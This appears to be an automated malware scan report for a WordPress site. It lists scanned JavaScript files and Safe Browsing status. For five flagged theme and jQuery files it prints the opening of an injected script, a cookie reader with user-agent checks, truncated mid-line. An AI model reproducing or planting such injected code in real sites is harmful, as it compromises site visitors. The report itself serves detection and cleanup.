Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=globalmanofleisure.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://globalmanofleisure.com/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://globalmanofleisure.com/test404page.js | 404 Not Found Content-Length: 13427 Content-Type: text/html | clean |
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.9.3 | 200 OK Content-Length: 33 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo jQuery.noConflict(); Antivirus reports:
| ||
http://globalmanofleisure.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8178 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=3.9.3 | 200 OK Content-Length: 24995 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=3.9.3 | 200 OK Content-Length: 5337 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=3.9.3 | 200 OK Content-Length: 891 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=3.9.3 | 200 OK Content-Length: 890 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/themes/Origin/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 3702 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo var height = this.tagName.toLowerCase() == 'object' ? $this.attr('height') : $this.height(), aspectRatio = height / $this.width(); $this.wrap('<div class="fluid-width-video-wrapper" />').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery ); Antivirus reports:
| ||
http://globalmanofleisure.com/wp-content/themes/Origin/js/jquery.infinitescroll.min.js?ver=1.0 | 200 OK Content-Length: 21940 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://globalmanofleisure.com/wp-content/themes/Origin/js/custom.js?ver=1.0 | 200 OK Content-Length: 5154 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo $(this).css( { 'top' : '-24px', 'opacity' : '1' } ).animate( { 'top' : '9px' }, 150 ); } ); } ); $('#ie8 .image-info').css( 'opacity', '0' ); if ( $('#ie8 .image-info').length ){ $('.entry-image').hover( function(){ $(this).find('.image-info').css( 'opacity', '1' ); }, function(){ $(this).find('.image-info').css( 'opacity', '0' ); } ); } }; }); })(jQuery) Antivirus reports:
| ||
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15647 Content-Type: application/javascript | clean |
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 4777 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: globalmanofleisure.com
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
GET / HTTP/1.1
Host: globalmanofleisure.com
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: globalmanofleisure.com
Referer: http://www.google.com/search?q=globalmanofleisure.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: globalmanofleisure.com
Referer: http://www.google.com/search?q=globalmanofleisure.com
Result:
The result is similar to the first query. There are no suspicious redirects found.